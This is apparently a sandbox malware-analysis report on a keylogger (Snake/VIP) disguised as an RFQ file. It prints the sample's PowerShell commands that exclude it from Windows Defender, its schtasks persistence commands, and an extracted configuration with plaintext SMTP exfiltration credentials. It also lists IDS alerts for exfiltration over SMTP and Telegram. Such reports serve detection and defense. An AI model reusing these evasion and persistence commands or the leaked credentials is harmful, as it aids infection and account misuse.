Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Overview

General Information

Sample name:INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Analysis ID:1618870
MD5:379881c017323bbb89ba4617d0d3df7c
SHA1:a57be5d3ca8e6410f411cbb8582334601e15c479
SHA256:58c1bb1c19cd551261465044f769a313549a574a345a2754414e48f8fc08bcbf
Tags:exeuser-julianmckein
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe" MD5: 379881C017323BBB89BA4617D0D3DF7C)
    • powershell.exe (PID: 7612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8008 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7744 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • nDEusQ.exe (PID: 7984 cmdline: C:\Users\user\AppData\Roaming\nDEusQ.exe MD5: 379881C017323BBB89BA4617D0D3DF7C)
    • schtasks.exe (PID: 8184 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nDEusQ.exe (PID: 4524 cmdline: "C:\Users\user\AppData\Roaming\nDEusQ.exe" MD5: 379881C017323BBB89BA4617D0D3DF7C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "587", "Password": "sales02@tmcksa.com", "Host": "smartyok4#", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "sales02@tmcksa.com", "Password": "smartyok4#", "Host": "mail.tmcksa.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            Click to see the 23 entries
            SourceRuleDescriptionAuthorStrings
            1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  10.2.nDEusQ.exe.429ad58.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    10.2.nDEusQ.exe.429ad58.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                      Click to see the 32 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ParentImage: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ParentProcessId: 7440, ParentProcessName: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ProcessId: 7612, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ParentImage: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ParentProcessId: 7440, ParentProcessName: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ProcessId: 7612, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\nDEusQ.exe, ParentImage: C:\Users\user\AppData\Roaming\nDEusQ.exe, ParentProcessId: 7984, ParentProcessName: nDEusQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp", ProcessId: 8184, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.254.185.123, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, Initiated: true, ProcessId: 7896, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49751
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ParentImage: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ParentProcessId: 7440, ParentProcessName: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", ProcessId: 7744, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ParentImage: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ParentProcessId: 7440, ParentProcessName: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ProcessId: 7612, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ParentImage: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ParentProcessId: 7440, ParentProcessName: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", ProcessId: 7744, ProcessName: schtasks.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-19T09:08:00.722061+010020600481Malware Command and Control Activity Detected192.168.2.749752192.254.185.123587TCP
                      2025-02-19T09:10:24.508328+010020600481Malware Command and Control Activity Detected192.168.2.749751192.254.185.123587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-19T09:08:29.831150+010028033053Unknown Traffic192.168.2.749715104.21.32.1443TCP
                      2025-02-19T09:08:32.699650+010028033053Unknown Traffic192.168.2.749724104.21.32.1443TCP
                      2025-02-19T09:08:33.493722+010028033053Unknown Traffic192.168.2.749726104.21.32.1443TCP
                      2025-02-19T09:08:34.056065+010028033053Unknown Traffic192.168.2.749728104.21.32.1443TCP
                      2025-02-19T09:08:35.685859+010028033053Unknown Traffic192.168.2.749734104.21.32.1443TCP
                      2025-02-19T09:08:37.882479+010028033053Unknown Traffic192.168.2.749742104.21.32.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-19T09:08:27.653275+010028032742Potentially Bad Traffic192.168.2.749712193.122.130.080TCP
                      2025-02-19T09:08:29.028281+010028032742Potentially Bad Traffic192.168.2.749712193.122.130.080TCP
                      2025-02-19T09:08:30.411477+010028032742Potentially Bad Traffic192.168.2.749716193.122.130.080TCP
                      2025-02-19T09:08:31.137660+010028032742Potentially Bad Traffic192.168.2.749719193.122.130.080TCP
                      2025-02-19T09:08:31.714312+010028032742Potentially Bad Traffic192.168.2.749721193.122.130.080TCP
                      2025-02-19T09:08:31.934559+010028032742Potentially Bad Traffic192.168.2.749719193.122.130.080TCP
                      2025-02-19T09:08:33.588119+010028032742Potentially Bad Traffic192.168.2.749727193.122.130.080TCP
                      2025-02-19T09:08:34.575217+010028032742Potentially Bad Traffic192.168.2.749731193.122.130.080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-19T09:08:38.779277+010018100071Potentially Bad Traffic192.168.2.749745149.154.167.220443TCP
                      2025-02-19T09:08:41.501044+010018100071Potentially Bad Traffic192.168.2.749750149.154.167.220443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeAvira: detected
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeAvira: detection malicious, Label: HEUR/AGEN.1304597
                      Source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "587", "Password": "sales02@tmcksa.com", "Host": "smartyok4#", "Port": "587"}
                      Source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sales02@tmcksa.com", "Password": "smartyok4#", "Host": "mail.tmcksa.com", "Port": "587", "Version": "4.4"}
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeReversingLabs: Detection: 27%
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeVirustotal: Detection: 33%Perma Link
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeReversingLabs: Detection: 27%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpackString decryptor: sales02@tmcksa.com
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpackString decryptor: smartyok4#
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpackString decryptor: mail.tmcksa.com
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpackString decryptor: 587
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpackString decryptor:

                      Location Tracking

                      barindex
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49714 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49722 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49750 version: TLS 1.2
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 00C1F45Dh9_2_00C1F2C0
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 00C1F45Dh9_2_00C1F4AC
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 00C1FC19h9_2_00C1F961
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065C3308h9_2_065C2EF0
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CEA79h9_2_065CE7D0
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065C2D41h9_2_065C2A90
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CD919h9_2_065CD670
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_065C0673
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065C3308h9_2_065C2EE6
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CE1C9h9_2_065CDF20
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CEED1h9_2_065CEC28
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CF781h9_2_065CF4D8
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CD069h9_2_065CCDC0
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CD4C1h9_2_065CD218
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065C3308h9_2_065C3236
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CDD71h9_2_065CDAC8
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CE621h9_2_065CE378
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065C0D0Dh9_2_065C0B30
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065C16F8h9_2_065C0B30
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_065C0853
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_065C0040
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CF329h9_2_065CF080
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 4x nop then jmp 065CFBD9h9_2_065CF930
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 0569C813h10_2_0569C960
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 0544F45Dh14_2_0544F4AC
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 0544F45Dh14_2_0544F2C0
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 0544FC19h14_2_0544F961
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DC3308h14_2_06DC2EF0
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DC2D41h14_2_06DC2A90
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCF781h14_2_06DCF4D8
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCDD71h14_2_06DCDAC8
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DC3308h14_2_06DC2EEB
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCD919h14_2_06DCD670
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCD4C1h14_2_06DCD218
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DC3308h14_2_06DC3236
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCEA79h14_2_06DCE7D0
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCE621h14_2_06DCE378
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DC0D0Dh14_2_06DC0B30
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DC16F8h14_2_06DC0B30
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCE1C9h14_2_06DCDF20
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCF329h14_2_06DCF080
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06DC0040
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCEED1h14_2_06DCEC28
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCD069h14_2_06DCCDC0
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 4x nop then jmp 06DCFBD9h14_2_06DCF930

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.7:49751 -> 192.254.185.123:587
                      Source: Network trafficSuricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.7:49752 -> 192.254.185.123:587
                      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49745 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49750 -> 149.154.167.220:443
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
